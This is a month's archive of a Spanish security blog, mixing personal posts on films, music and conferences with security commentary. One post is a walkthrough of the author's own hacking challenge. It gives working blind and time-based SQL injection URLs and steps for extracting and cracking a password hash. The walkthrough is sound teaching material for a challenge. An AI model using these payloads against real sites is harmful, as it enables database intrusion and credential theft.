Un informático en el lado del mal: agosto 2008

domingo, agosto 31, 2008

El Único

Hace unos años, cuando empezaba a trabajar en esto de la informática me confundían mucho con otra persona. Resulta, que así es la vida, que en la subsidiaria de Spectra en España trabajaba una persona que se llamaba Chema Alonso…pero que no era yo. Sí, así era y eso provocaba que de cuando en cuando nos cayeran cosas cruzadas, es decir, algunas veces me decían cosas que no tenían que ver conmigo y otras le pasaba a él lo contrario.

Recuerdo que viendo la peli de “El único” de Jet Li me acordé de esta situación. “El único” es una de esas “piniculas” que me gustan mazo y que se encuentra en mi mente en una situación especial debido a esa extraña unión que me llenó durante años de cine asiático y francés. Así, durante una temporada, me comí todo lo que pude de Luc Besson, Vincent Cassel, Jet Li, Jean Renó y Tchéky Karyo, que no hay malo, más malo cuando hace de malo. Películas como “El Beso del Dragón”, “Romeo debe morir”, “Danny the Dog”, “Juana de Arco”, “Dobermann”, “El odio”, “Crying Freeman”, “Hitman”, “El Quinto elemento”, “El Pacto de los Lobos”, “Nikita”, “León el profesional”, “El pacto de los lobos 2”, “Lee mis labios”, “Birthday girl”, “Yamasaki” o “Ronin” fueron mi día a día durante un par de años de mi vida.

Dobermann
Después de esta fase digievolucioné a algo "más elevado" y al cine británico con "Trainspoting" y sobre todo tras conocer a Jason Statham y caer en "Lock & Stock", "Snatch", "Transporter", etc... que acabaría haciendo una de las mejores películas de acción que he visto nunca "CRANK". Si quieres saltar 90 minutos delante de la tele tienes que ver esta película pero no te pierdas nada, pues desde el minuto 1 la peli está con acción total y no hay descanso.

“¿Recuerdas que te dije que era programador de videojuegos? Pues mentí, soy asesino a sueldo”
En la peli de “El Único” Jet Li debía matar a Jet Li. Bueno, en realidad era un Jet Li cabrón que venía de otra dimensión que había descubierto que “la energía ni se crea ni se destruye sólo se transforma” de tal forma que por cada copia suya que mataba en otra dimensión recibía una porción de su energía ya que esta, se repartía entre los Jet Lis vivos de otras dimensiones. Esta peli, bajo esta “sesuda” premisa se convertía en una sucesión de danzas de karate y rijostios continuos para dar un peli de hora y media de pura acción (sin llegar a ser CRANK)

El único
Aprovechando que tenemos Internete hoy en día, con sus “blós”, su web 3.11 para trabajo en grupo, las redes sociales, las redes sosiales para meter, el twitel y la puta de oros, me dio por rastrear a otros “Chema Alonso” y ver a cuantos tendría que enfrentarme en un hipotético juego de “El Único”. Así, he descubierto a algunos Chema Alonso muy interesantes:

1) Chema Alonso “El artista”

Artista salmantino, que lo mismo pinta que hace fotos, que monta espectáculos audiovisuales
2) Chema Alonso “El deportista”

Chema Alonso repartiendo alegría
Deportista cántabro que reparte más que el cartero y que ahí podéis ver en acción. Por si os queda alguna duda del resultado del combate, Chema Alonso ganó.

3) Chema Alonso “El escritor”

Coeditor y escritor en periódicos
4) Chema Alonso “El informático”

Escribe en listas de informática e incluso hace postcast tecnológicos ya que es miembro de la oficina del W3C en España.

5) Chema Alonso “El de Madrid”

Moreno, 1.80, 75 kilos, casi soy yo pero yo soy: Moreno, 1,78, 77 kilos
Se nota que no es informático, porque tiene 3 "amigas".

Es curioso todo esto y empiezo a creer que algo hay ahí en "El Único" pues de todos tengo algo ¿no?, pero...... seguro que te estás preguntando: "¿Y por qué coño le da por pensar a este tipo estas cosas hoy?". La respuesta es sencilla: he visto que un amigo mío que se llama David Barroso quería abrirse un blog y resulta que al intentar buscar el blog de David Barroso me han aparecido muchos David Barrosos distintos... ¿Has buscado a ver cuántos hay como tú por el mundo?

Saludos Malignos!

sábado, agosto 30, 2008

Púuuuuuuuuuuuuuublirecord, nanananá

Sin un pavo en el bolsillo, aguantando al cuñao de turno que es el único que tiene algo de pasta para pagarse unas gambas y unas rabitas en el chiringuito de turno, así andaréis muchos de vosotros, ramplando con la crisis.

Menos mal que empieza la liga y ya hay una buena escusa para quedarse en casa. “No, es que a mí el fútbol me gusta verlo en casita” y así, con una cerveza y unos pistachos echamos la tarde del sábado. Es lo que tiene la crisis esta, que todo el mundo se está pensando muy mucho en que gastar el dinero.

Así le debe estar pasando a la gente de Telefónica y los Ay!fones, pues desde que saltó a la luz lo de que las famosas colas estaban pagadas y formadas por figurantes, parece que todo el mundo te quiere regalar un ay!fon.

No hay blog de postín, ni web de postón que no tenga un pedazo de banner con “consigue un ay!fon”. Sí, hemos pasado de una supuesta situación inicial en la que no había ay!fones por ningún sitio para nadie a una situación en la que todo el mundo me quiere regalar uno.

Y es que esto de la publicidad crea extraños aliados. De repente aparece en un sitio de promoción, proselitismo y reclutamiento de la causa los banners de la compañía del mal, o de repente, una web de lucha a favor de la libertad aparece con un banner de ay!fon (busca tú este link).

Si no, siempre se puede dejar el adwords de Google en tu blog del SL defendiendo que no quieres ejecutar nada sin saber que código tiene y pones… ¿El adwords? Y digo yo… ¿Tienes tú el código del adwords? ¿Tienes garantía de que en tu blog de software libre no te vaya a meter un anunció Google de algo que tú no quieres como por ejemplo…. de Spectra?

“Si bueno, es que yo quiero leer el código fuente de todo, pero es que con el adwords gano pasta”

La publicidad y el dinero suele hacer extraños aliados, como Google sponsorizando a Apache mientras otros reclaman “menos pasta y que reingrese en el proyecto los cambios en Apache que tiene en GWS”. O el partnership de Sun para vender todos sus servidores con Windows o las promociones que Spectra y Oracle realizan conjuntamente de servidores con Windows y base de datos Oracle o servidores SQL Server con productos SAP o que Oracle fuera partner Gold en el Spectra Teched….

Extraños aliados en este mundo de tecnología, pero con cierta lógica. Esa lógica extraída de los sistemas de Data Mining que permiten encontrar las relaciones ocultas en el fondo de las cosas. Esos sistemas que saben que los jóvenes americanos que juegan al WOW son vírgenes o que cualquier búsqueda con una X en Amsterdam es de alguien que quiere follar.

Y por debajo de todo… la publicidad viral, esa que se replica por todas partes, incluso simulando no ser hecha por quien ha sido hecha.

Algún día deberé aprender dónde invertir mi pasta en publicidad para que lo que yo quiero promocionar se quede en mi mente como la música de los anuncios de Publirecord en los cines.

Saludos Malignos!

viernes, agosto 29, 2008

Más rápido que la bala ... y que la pistola

Reconozco que yo he sido más de Iron Maiden, Metallica, Rosendo y Barón Rojo que de los Guns and Roses. Cuando salió ese grupo hicieron una gira por los USA junto con Metallica en la que Metallica iba de telonero… y eso dolía.

Siempre les tuvimos un pelín de tirria, pues a nosotros nos iba más el negro de Hetfield que los pañuelitos de Axl pero…hay que reconocer que los Guns eran la polla. Recuerdo el día que, tras haber oído muchas veces las canciones en cinta, puse el disco original del Appettite en la cadena y empezó a sonar el Welcome to the Jungle. Si no sabes qué sensación es esa o nunca lo has oído, ponte bien los cascos y escucha los primeros acordes…

Welcome to the Jungle
Pero es que después seguía con una canción preciosa con unos de los mejores riffs de la historia… el Sweet Child O´mine…. Me cago en todo lo cagable ¡cómo sonaba esa guitarra, ese bajo y esa voz…! Esta canción seguro que es una de las mejores de la historia del Rock.

Sweet Child o'mine
Pero es que los cabrones aun hicieron el Paradise City, el Mr Brownstone, y el increíble final con Rocket Queen dedicada a una prostituta con una parte final increíble.

Rocket Queen
Joder, que pasote… recuerdo que mientras todo esto pasaba Metallica seguía con su Black álbum, qué, después de la resacad de …And Justice for All nos tenía divididos entre los que veíamos con buenos ojos el cambio y los que decían que “menos videos musicales” y más Ones y Harvester of Sorrow.

Metallica - One
Después de hacernos esperar los Guns n’roses sacarían el Use your illusion. Joder, dos discos dobles con un montonazo de canciones nuevas y con nuevo sonido. Los Gun habían puesto el Lies, el Appettite y Use your Illusion, tres cosas totalmente dispersas en el mercado… y a mí me encantaba el estilo de Use your illusion, con el Civil War, Get in the ring, November Rain, Don´t Cry, knocking on the heaven doors, Live and let die o You could be mine. Al final fueron demasiadas canciones… y algunas no gustaron tanto… y.. después todo se jodió. Las drogas, las peleas y la fama hicieron el resto. Lo que nos quedó después fue el Spagetti Incident que bien se podía haber quedado sin estar.

Gun´s and Roses - Civil War

Guns and Roses - November Rain
Ahora, parece que va a haber nuevo disco… pero… un blogero se ha hecho con las canciones antes de que se publicaran y puso 9 temas en un ..¿blog? Bueno, le han enganchado en los USA, así que, conociendo como se las gastan allí y la pasta de la industria musical en los USA…no me gustaría estar en su pellejo. La pregunta... ¿cómo se hizo con las canciones?

En fin… cualquier excusa es buena para volver a escuchar Rock´n Roll.

PD: No quiero dejar de recalcar que no dejó de sorprenderme que Slash cambiara a Axl por Michael Jackson... está claro que a este tipo le van los "raritos".

Slash & M. Jackson
Saludos Malignos!

jueves, agosto 28, 2008

La bien pagá

Cuando vas a dar una charla a una conferencia de seguridad informática se supone que lo último que te interesa es la pasta. Sí, eso es cierto en las grandes conferencias de seguridad informática dónde sólo con estar allí te corres de gusto. Sin embargo, en algunas de ellas te pagan.

En las conferencias de Blackhat Europe 2008 nos pagaron 1 vuelo, 1 habitación 2 noches y 500 dolares por charla. En la DeepSec de Viena se hacen cargo de 1 vuelo en economy class, y 2 noches de hotel. En la Defcon 16 te dan 200 dolares o 3 entredas para que las regales a amigos y en la ToorCon creo que nada.

El objetivo cuando voy a una de estas charlas es principalmente porque es un reto y un gustazo estar con la gentuza que está por allí y al final, todo es distinto, es una fiesta, algo genial. Además me viene bien publicar los temas de trabajo de mi doctorado. El que te cojan es encima la excusa perfecta para ir a conocer gente, escuchar charlas chulas y hacer un poco de turismo (que nunca viene mal), pero sabes que en las charlas grandes no vas a ganar dinero.

Lo curioso de este asunto, es que en Defcon16 me dieron un talón nominativo, pero... no me preguntaron a que nombre y me lo pusieron a nombre de "Chema Alonso". Este talón hay que ingresarlo en tu banco en España y que ellos lo cobren en los USA. En mi DNI no pone Chema, sino José María, que es mi nombre... ¿lo cobraré?

La pasta de la Defcon16
De momento hemos pasado la fase 1 y el banco en España ha tragado y lo está cursando. Todo será que al final lo echen para atrás, pero.... no importará. Siempre puedo pedir que me hagan otro, que sería un tramite costoso y largo, pero... hasta en cierto manera, me apetece que me lo devuelvan. No es mucha pasta, pues después del cambio y las comisiones de cobro se me queda en 119 € así que.... ¿No sería un bonito cuadro en mi habitación?.

A parte de "este bonito posible cuadro" de la Defcon me traje también un montón de pegatinas, en este caso "tomé libremente" 4 conjuntos de pegatinas para ir regalándoselas a los colegas esos que gustan de ponerle pegatas al portátil.

Un juego de pegatas
Al final, con el "posible cuadro", los juegos de pegatas, el pedazo de badge chulo y estar allí...¿quién no se daría por bien pagado? Yo sí.

Saludos Malignos!

miércoles, agosto 27, 2008

Reto Hacking I con Marathon Tool

Hola a tod@s,

Allá por finales del 2006, cuando salió el Reto Hacking I, este fue diseñado para ser pasado utilizando Blind SQL Injection en base a patrones, es decir. Bastaba con fijarse en los cambios de los valores de las pistas cuando se inyecta algo True y cuando se inyecta algo False:

Verdadero: Sale la pista 2

http://www.informatica64.com/retohacking/pista.aspx?id_pista=2 and 1=1

Falso: Sale la pista 1 que es la de por defecto ante ausencia de valores en la query.

http://www.informatica64.com/retohacking/pista.aspx?id_pista=2 and 1=2

La dificultad dos era adivinar que estaba programado usando Access y claro, al no haber diccionario de datos había que adivinar que la había una tabla llamada Contrasena, con una columna llamada Contrasena. Pero... para eso estaban las pistas. Si quieres puedes leer el solucionario que hizo Dani Kachakil sobre él.

Pero... ¿se podría haber sacado sólo con la pista 1, es decir, sin que hubiera existido la pista 2?

http://www.informatica64.com/retohacking/pista.aspx?id_pista=1 and 1=1

http://www.informatica64.com/retohacking/pista.aspx?id_pista=1 and 1=2

Como se puede ver en este caso no hay diferencia pues en caso de error el programa devuelve la pista por defecto, es decir, la pista 1. ¿Solución? Pues pasarlo con consultas pesadas... y Marathon Tool.

Paso 1: Descubrir la tabla y la columna

Verdadero: La consulta dura como unos 6 segundos más o menos

http://www.informatica64.com/retohacking/pista.aspx?id_pista=1 and (select count(*) from MSysAccessObjects as t1, MSysAccessObjects as t2, MSysAccessObjects as t3, MSysAccessObjects as t4, MSysAccessObjects as t5, MSysAccessObjects as t6, MSysAccessObjects as t7, MSysAccessObjects as t8, MSysAccessObjects as t9, MSysAccessObjects as t10)=0 and exists (select Contrasena from Contrasena)

Falso: La consulta dura poco más de 1 segundo, sólo la latencia de red.

http://www.informatica64.com/retohacking/pista.aspx?id_pista=1 and (select count(*) from MSysAccessObjects as t1, MSysAccessObjects as t2, MSysAccessObjects as t3, MSysAccessObjects as t4, MSysAccessObjects as t5, MSysAccessObjects as t6, MSysAccessObjects as t7, MSysAccessObjects as t8, MSysAccessObjects as t9, MSysAccessObjects as t10)=0 and NOT exists (select Contrasena from Contrasena)

Fase 2: Sacar la Contraseña con Marathon Tool

Para esta fase usamos Marathon Tool, se configura como se ve en la imagen. En este caso es un Access 2000, pero podría haber sido un Access 2003/2007 pero esto ya lo tendrías que haber probado en la Fase 1. Después se inicializa la tool

Configuración Access 2000 para Reto Hacking I
Después se debe configurar la tabla y la columna a extraer. Esto se debe realizar en las bases de datos Access porque no disponen de un diccionario de datos, por eso era necesaria la Fase 1:

Configuración de Tabla y columna
Una vez configurada se da al botón de Get Data y Marathon Tool se pone a currar...

Marathon Tool trabajando
En el log se puede apreciar que Marathon Tool ha encontrado el número de registros y la longitud del dato. En este caso 1 registro de 32 caracteres de longitud. Al final, los datos aparecerán en la pestaña de Database data. Una vez aparezca el Hash el resto es crackearlo y listo.

Si te apetece aprender más sobre este tema:

- Time-Based Blind SQL Injection using Heavy Queries (Parte I de II)
- Time-Based Blind SQL Injection using Heavy Queries (Parte II de II)
- Descargar Marathon Tool

Saludos Malignos!

martes, agosto 26, 2008

Escrinsós

Después de la entrada de ayer por la tarde sobre el IE que vale para todo, hoy un informante "anónimo" (y lector asiduo del bló) que deséa permanecer en el "economato" me ha enviado dos escrinsos cogidos por él.

El primero, según cuenta, está sacado de un proyecto que le enviaron. En él, esta captura adornaba el documento para dar brillo a la presentación del texto.

El proyecto y el proyectador
El segundo escrinso esta sacado del ordenador de una mujer andaluza que había cambiado el nombre de los iconos para aclararse mejor.

El fotosó
Lo que más gracia me ha hecho ha sido la historia de la calculadora:

"Y entonces le pregunté “¿y tampoco te gustaba el nombre de la calculadora?”, a lo que me contestó: “es que yo no la uso como calculadora, solo pulso los numéricos a veces para pasar el rato” Pero te juro que me lo dijo tan seriamente, sin reírse en absoluto, que aún tengo mis dudas de si lo decía de coña y se estaba quedando conmigo, o es que de verdad que estaba un poco loca "

Me parto la caja.

Saludos Malignos!

De cachondeo por el mundo

Hola amig@s,

o debo decir...¿adios? Me piro de viaje una vez más, esta vez me iré a ver amigos a dos partes del mundo totalmente distintas. En todas ellas, llevaré a mi co-speaker...

La primerá será en San Diego para participar en la X ToorCon. No, no vamos a contar la charla de LDAP Injection & Blind LDAP Injection, ni tampoco será la de Time-based blind SQL injection using heavy queries. En este caso es "RFD (Remote File Downloading) using blind techniques" y para los que habéis pasado el Reto Hacking V ya sabéis de que va a ir.

Primeros ponetes seleccionados
Es curioso pues entre los ponentes seleccionados está Alexander Sotirov con la charlita de impresionar a su novia saltando las protecciones de memoria de Windows Vista. Asistiré a ver la presentación en vivo y en directo y escuchar con atención que nos cuenta sobre todo lo dicho. También están muchos de los ponentes de la Defcon16 como Ben Feinstein hablando sobre el fallo de Debian, David Byrne con su Grendel-Scan y alguno más.

En Noviembre nos vamos a ir a Viena a la DeepSec 2008 aunque allí vamos a repetir la charla de LDAP Injection & Blind LDAP Injection estará bien, pues coincidimos con Luciano Bello, que aprovechará para hacer un alto en el camino en España, y dónde estará Haroon Meer de SensePost haciendo una charla muy interesante sobre los ataques basados en tiempo que me interesa ver mucho, dónde habrá otro Español -Simón Roses- y dónde se darán charlas muy chulas sobre malware, como por ejemplo el funcionamiento de la botnet Storm o los problemas con los SWF.

Pero...cuando estás en el extranjero se echan de menos esas noches de salir y no comerse un colín, de cenar un entrecot al Roquefort con una botella de Protos, de tomar calimocho con patatas bravas, esos cubatas con unos kikos discutiendo de política por los bares de Valencia, Murcia, Barcelona, Vigo, esas cervecitas en Sevilla, blasmefar contra los jefes, discutir sobre informática en las terrazas de las Españas y coger un taxi para tener una petá sobre el futbol... estoy organizando una gira de Seguridad para Enero del año 2009.

Esto quiere decir, que, maletita en riste, daremos una vuelta a "esta noble piel de toro" para llegar a 10 ciudades. Ya os iré dando más información, que antes tenemos el Asegúr@IT III en Bilbao y la semana que viene os informaré de las actividades que tenemos cerradas por España.

Saludos Malignos!

lunes, agosto 25, 2008

Internet Explorer vale para todo

Y si no que se lo digan al diseñador de esta web:

Visto en ThedaylyWTF
Y cómo alguno dice... joder lo que pesa el puto icono.

Saludos Malignos!

SQL Faster Paste

Buenos días de lunes,

ya que os hemos puesto disponibles Marathon Tool y Thumbando hoy os dejo otra pequeña tool que hizo nuestro compañero Carlos "3pezones". Este pequeño Add-in es para Visual Studio 2005 o 2008 y está pensado para trabajar más rápido cuando estás desarrollando aplicaciones que tiran contra bases de datos.

Imágina un entorno en el que tienes que lanzar muchas consultas SQL contra una base de datos para sacar informes, consultar datos o mostrar información en pantalla en función de datos recogidos por el usuario.

En esos entornos tienes que, en primer lugar, probar la consulta SQL con tu analizador de consultas. Después, una vez que la consulta funcione y extráiga los datos que a ti te interesan tienes que pasarla a tu código en Visual Studio. Allí habrá que crear las variables y parametrizar la consulta para no comerte ningún tipo de SQL Injection.

Para realizar todo este proceso "3pezones" se creo SQL Faster Paste. El proceso de uso es el siguiente: Una vez instalado este Add-in en tú Visual Studio, pruebas tu consulta en el analizador SQL que estés utilizando.

Consulta en SQL Analyzer
Cuando la consulta funcione como tú quieres, la copias al portapapeles y vas a Visual Studio. Allí, tas haber instalado el Add-in tendrás un iconito con una cara amarilla sonriente. Púlsalo y la consulta será convertida a formato C# .NET.

Conversión a .NET con SQL Faster Paste
Una vez este generado este código en C# ya podrás usarlo directamente en tu programa.

En el código
SQL Faster Paste permite trabajar con plantillas en XML asi que puedes personalizar el código que quieres que te genere a partir de la consulta SQL en el portapales. Tienes la tool, el código fuente y la información sobre como personalizar el código generado en CodePlex: Sql Faster Paste

Saludos Malignos!...[y ánimo con el lunes]

domingo, agosto 24, 2008

Las Cagadas en Spectra

Desde siempre el discurso que hemos tenido en las charlas es que en Spectra, a pesar lo que mucho subnormal iba diciendo por ahí, no son peores en seguridad que los demas. Recuerdo una frase mítica que me enseñó un amigo:

"Sí, ya sabemos que todos los que saben programar bien están en el software libre, pero alguno, aunque sea por casualidad o por dinero habrá en Spectra, ¿no?"

Esto no quiere decir que en Spectra no la cagen y mucho y creo recordar que este año en un evento para Hosters, la presentación que dimos el abuelo Parada y yo tenía estas tres diapos nada más empezar.

LA PRIMERA EN EL EGO

Experts web site Francia
LA SEGUNDA EN LA FRENTE

Sitio ieak.microsoft.com con defacement
- Defacement en Microsoft.com

LA TERCERA EN LA INDUSTRIA

Web de Partners en UK
- Cómo Comerse una Comilla

No, Spectra no tiene porque ser mejor... pero lo que sí es seguro, es, que a pesar de que mucho tonto está como loco por publicar cualquier cosa en contra de Windows, Spectra se puso las pilas con seguridad con la iniacitiva TCI que empezó allá por el año 2002 y se notó y se seguirá notando.

Saludos Malignos!

sábado, agosto 23, 2008

Rojo y Colorado

Había pensado en llamar a este artículo algo así como la "Puntilla de Red Hat y Fedora" haciendo homenaje a la imparcialidad en la que se tratan los temas de seguridad en otros blogs con muchos más cereales que éste, pero he decidido no hacerlo.

[A proposito, un amigo, mucho más sexy y más guapo que yo y que no es un "técnicoless" ya se ha terminado el paper de cómo saltarse las protecciones de memoria de Windows Vista y ha publicado sus conclusiones]

Vale, ya os habreis enterado que se han colado en los servidores de Fedora y de Red Hat. En Red Hat se colaron hace poco, y consiguieron la clave de firma de paquetes con la que consiguieron firmar "algún pequeño numero de paquetes" que tenían que ver con el OpenSSH. Como dicen ellos:

"...the intruder was able to sign a small number of OpenSSH packages relating only to Red Hat Enterprise Linux 4"

Supongo que podría haber metido los comentarios que metió el amigo Kurt al paquete OpenSSL de Debian... más o menos :P ¿no?. Bueno, esto no está confirmado, son especulaciones malignas.

Sin embargo, la gente de Red Hat asegura que las actualizaciones distribuidas por Red Hat Network (algo así como el Windows Update de Spectra pero pagando) es seguro y no ha pasado por allí ningún paquete manipulado y firmado por el atacante. Claro, y no pasa nada en ningún sitio. Si hubiera sido el Windows Update de Spectra...¡otra gallo cantaría en las noticias del telediario!.

Lo curioso es que según Red Hat no ha pasado nada por el canal RHN, pero... sólo por si acaso y Dios no lo quiera y no sabemos cómo hubiera podido pasar, que te hubieras instalado uno de esos paquetitos OpenSSH han sacado un update de seguridad en OpenSSH.

Curiosamente, hoy también se hace público que se han colado en los servidores de Fedora, pero dicen que ahí no, seguro que no, por el pingüino de sombrero rojo, ahí no han conseguido la clave de firma.

Una frase que me llama la atención es:

"It is important to note that the effects of the intrusion on Fedora and Red Hat are *not* the same"

¿Qué querrán decir "exáctamente"?. Sí, es que las distribuciones Linux tienden a "alegrarme" el verano, como hace dos años con Debian y este mismo año, el año pasado con Gentoo y Ubuntu.

Además, después de ver como funcionan los sistemas de evilgrade, y viendo que esto de meterse en el repositorio principal de proyectos, como ya pasó con Wordpress y algún que otro sitio... habrá que pensar en preocuparse bien de los procesos de actualización ¿no?.

Ahora empiezan las apuestas, haz tú la tuya ¿por qué ha sido?:

Opción A: Cagada de adminstrador en configuraciones: Contraseñas débiles en un servicio, sistemas sin cifrar, canales inseguros, etc...

Opción B: 0-day no conocido.

Opción C: Exploit conocido pero no parcheado a tiempo el sistema.

Opción D: Propón tú.

Yo, como soy un tío muy, muy malo, voy a apostar por la Opción C (que es más divertida y dará más juego), ¿tú que dices?

Saludos Malignos!

viernes, agosto 22, 2008

Entrevista alexav8 de Wikipedia

La primera vez que visité Argentina fue el pasado mes de noviembre, para participar en unas conferencias. Allí conocí a un montón de gente, y entre ellas a Alexav8. Para los argentinos es Alexa b ocho, pero para mí y los españoles es Alexa uve ocho. El caso es que ella me llevó a la edición anterior de la Ekoparty a ver la charla del pallo Francisco Amato. Tiempo después me lió para estar una semana en abril, dónde acabé con una semana ajetreada dando una charla con Francisco Amato, conociendo a Fede que tiene más energía que una batería de kriptonita, a Clauido y a Ezequiel (¿qué tal vegas eh?), a mi Luciano querido, a Cristian de Segu-info que es un amor de persona, y a un montón de gente que me trató de maravilla.

Y además de estar tan bien rodeada, ella, militante confirmada del lado del bien, se mete hasta el barro en mil historias. ¿Cómo lo hace?. En fin, la he hecho esta entrevista. Es larga, pero merece la pena leerla. Yo casi me arrepiento un poco por toda la caña que me dá, pero... así es la dura vida de estar en El Lado del Mal.

Alexa"uve"8
Nota: Los gallegos quizá necesitemos un diccionario de palabras argentinas e incluso de Lunfardo.

1.- A ver Alexa, ¿cuánto hay que saber para escribir en la wikipedia?

Justamente la wikipedia es un ejemplo de proyecto libre y colaborativo, o sea, que no hace falta que sepa mucho, con cada uno que sepa de un tema alcanza. Ya, claro, si sabés, mejor y si sabés mucho, mucho mejor, y por suerte hay gente que sabe mucho. Para que veas, mi primer artículo me lo borraron a los 5 minutos, y así me encapriché, y aprendí a escribir artículos, a poner una definición general, un cuerpo del artículo, alguna foto con licencia CC, los links internos, a otras páginas de la wikipedia, links externos, a páginas web que muestren el tema del artículo, y que no sean propaganda. Acordárse también de poner referencias de libros o notas...

Se aprende después, lo importante es ayudar, colaborar, tener espíritu. La wikipedia es mucho más que una enciclopedia, para el que la “conoce” y la “vive”… Es hacer pensar, revolver cabezas, siempre alguien te pregunta:”pero, yo, puedo escribir ahí?..no está “electroventilador”, lo puedo agregar?”

Se arman grupos, proyectos, ayudar, no solo a escribir, a compartir, a ayudar mismo. Por ejemplo en Argentina tenemos un capítulo de Wikimedia, que es el proyecto padre de wikipedia, y por ejemplo, impulsamos que no se pierdan tribus originarias, que van desapareciendo, las echan de sus tierras para hacer shoppings, que no se pierda esa historia, esos idiomas nativos, esa historia viviente, que la escriban en la wikipedia. O gente con discapacidades visuales, motrices, u otras, les hacemos la wikipedia accesible a ellos. Ya los que las empresas no les dan bola, porque es una minoría, son pocos y no ganan $$ con ellos, excepto que sea el hijo de un diputado, ahí si, ponemos nuestro granito de arena…

Pongo un ejemplo, para ciegos, hacer software, no lo hacen porque no ganan, son grupos chicos para hacer negocio, venderían poco...

Hacer las pag web accesibles, no puro flash....para los que tienen máquinas pedorras, conexiones lentas, en escuelas del interior, los conectamos por línea de comandos desde un server, personas con discapacidad, etc, etc, etc
¿Me fui de tema? Wikimedia es un universo….

2.- y...¿Habéis tenido muchos problemas legales por uso del copy & paste por parte de algún voluntario?

El problema del copy paste está todo el tiempo, pero no llega hasta tanto. Todo el tiempo estamos borrando artículos o poniendo carteles de copyvio se llaman, que quiere decir que ese artículo viola o podría violar un copyright. A veces ocurre, que el usuario contesta y es el autor del libro o la pag web de donde se copió el dato, ahí se aclara, se deja indicado y se vuelve a poner el artículo.

Los problemas más notorios son con las fotos, por ejemplo, yo saco una foto de un cuadro o la tapa de un cómic, y está mal ponerla en wikipedia. Si por ejemplo te fijas en el articulo de Wolverine en español no tiene foto, pero sí en inglés, y se aclara que esa imagen es sólo con licencia restringida para wikipedia en inglés. Si el original tenía copyright, la foto que le saqué tiene el mismo copyright, y el propietario no cambia.

Otro ejemplo son los dragones impresionantes de Ciruelo, un dibujante argentino que vive en Barcelona y que no hay una foto en su página para que lo conozcan :-( Pasa lo mismo con fotos de revistas, de fotógrafos…esa foto no es libre. Depende de la legislación de cada país, en Argentina son 25 años para que las fotos pasen al dominio público, una pintura 70 años. Argentina, al igual que otros países adhiere al Convenio de Berna. Con las esculturas es distinto, si están en lugares públicos, como una plaza, esa foto sirve.

¿Sabés que existe wikilibros? Libros libres y colaborativos ¿Y wikinoticias? dónde podés ser un periodista y escribirlas?. Wikipedia es solo una parte, la más conocida del proyecto wikimedia.

3.- Oye, ¿tienen los mismos problemas las chicas informáticas que los chicos informáticos para ligar?

Bueno, me parece que acá ganamos las mujeres.... Si los hombres no encuentran el verso para hacer, o no les sale, o no les entienden.......no ligan.... Del otro lado, como los hombres siempre están pensando en ligar, no importa de lo que hablemos las chicas, ellos no escuchan, entonces si hablo de cocina, de peinados o de las diferencias entre la reacción de fisión nuclear o fusión nuclear, en la energía atómica, no importa, los hombres piensan solo en eso… Y aparte como mujeres hay menos :)

Eso no se entiende, mujeres hay de sobra, 7 por hombre, pero cuando vas a una reunión de Lug o a una charla de seguridad es al revés, hay más hombres, por ende tenemos más suerte....excepto si es un congreso groso, competimos con las promotoras, y ahí salimos perdiendo. Todos baboseándose con las promotoras.....

4.- Venga, intenta responder esta pregunta sin usar la wikipedia ni buscar en google. ¿Has usado alguna vez el Microsoft BOB?

BOB, ni idea, debe ser ¿¿algo muy antiguo?? ¿Anterior al DOS? ¿¿Al principio de los tiempos apareció BOB, luego BOS, después COB, COS, hasta DOS?? ¿O extremadamente nuevo?, ¿o será el filesystem de Vista? ¿Ese que iba a salir nuevo?

No conozco mucho de MS, (mirá, te lo puse con mayúscula por ser vos), pero quizá sea alguna versión light, como esas windows angelical, windows tropical o windows banana - perdón, no recuerdo los nombres exactos- que me enteré hace poco que existen. ¿¿Es algún winlive cd??

Claro, a probar, nada ¿¿no?? Todo a comprar… o truchar ;-)

5.- Explicanos qué es el español neutro, que cuando yo lo escuché allí me quedé sorprendido.

Español neutro es algo nuevo, de la era globalizada y se usa mucho en las telenovelas. Es un español o castellano que no se diferencia si es argentino, español, puertorriqueño o mexicano. Las productoras grandes de novelas, como Televisa, contratan artistas de diferentes países, esas novelas se venden a Miami o a cualquier país de Latinoamérica, entonces queda feo varias tonadas de castellano, por eso se “neutraliza”, que suene todo igual, con el mismo cantito. Los artistas hacen cursos de español neutro, igual que algunos conductores de la CNN en español

¿Sabías que existe un idioma “simple inglés” en la wikipedia? Es una wikipedia en inglés básico. Y también wikipedias en lenguas indígenas como la de quichua, o la de navajo, un lenguaje apache. Te pongo a propósito el lenguaje apache ;-). Estos son todos los idiomas en que hay wikipedias, separados por cantidad de artículos.

6.- ¿Hay mucho vandalismo en la wikipedia?

Sí, hay muchos y a toda hora. Hay vandalismos notorios y otros que no se notan tanto. Ejemplos:

A Mozart, le cambian la fecha de nacimiento, 1756 por pocos años, le dan vuelta los números, le ponen 1765, que si no sabés del tema no te das cuenta...pero si ves que es un user anónimo el que hizo el cambio, sospechás, y buscas en libros, google u otras wikipedias para revertir el cambio. No se nota mucho, y quizá cualquiera no se da cuenta, y un chico que está haciendo su tarea y copia el artículo, lo pone mal, y las maestras le echan la culpa a la wikipedia, que no es confiable.

Pero no saben que la Enciclopedia Británica u otras usadas y muy consultadas también tienen errores, acá lo solucionamos rápido, es como el software libre, hay varios ojos vigilando y todos podemos colaborar ;-) Algunos lo ven y otros no lo ven....

Otros, vándalos, más fáciles, se agregan en las fechas de nacimientos de famosos o acontecimientos, por ejemplo, acá. (si vas al historial, verás un ejemplo). O en artículos de drogas o temas de sexo ponen barbaridades o sus historias, o puteadas, o links a páginas promocionando sus negocios.

También se vandalizan temas polémicos, artículos discutidos que, entonces, se protegen, Hitler, Bin Laden, Bush, entre algunos. Si te fijás en estas páginas, si no estás logueado no aparece la solapa “editar”, porque está protegida, debés registrarte/loguearte, para tocarla. Las “paginas protegidas” sólo pueden ser editadas por usuarios registrados, no por IPs (usuarios anónimos).

Otros vandalismos, entre comillas, son por como una palabra se dice en español, en argentino o chileno. Hubo discusiones de como poner título principal al artículo mouse, mouse se dice en Argentina y ratón de ordenador, en España.

Y como no conocen a Batichica, Gatubela, el batimovil, ya que para uds es Catwoman, Batgirl y no sé cómo le dirán al batimóvil. Es incompresible para mí, traducen todo, como mouse, firewall y no los personajes de Batman, ¿será porque son nombres propios? ¿¿Y el batimóvil?? ¿Lo dirán así pués?

7.- ¿Quién controla y cuida de mi gran amigo Wolverine/lobezno en la Wikipedia?

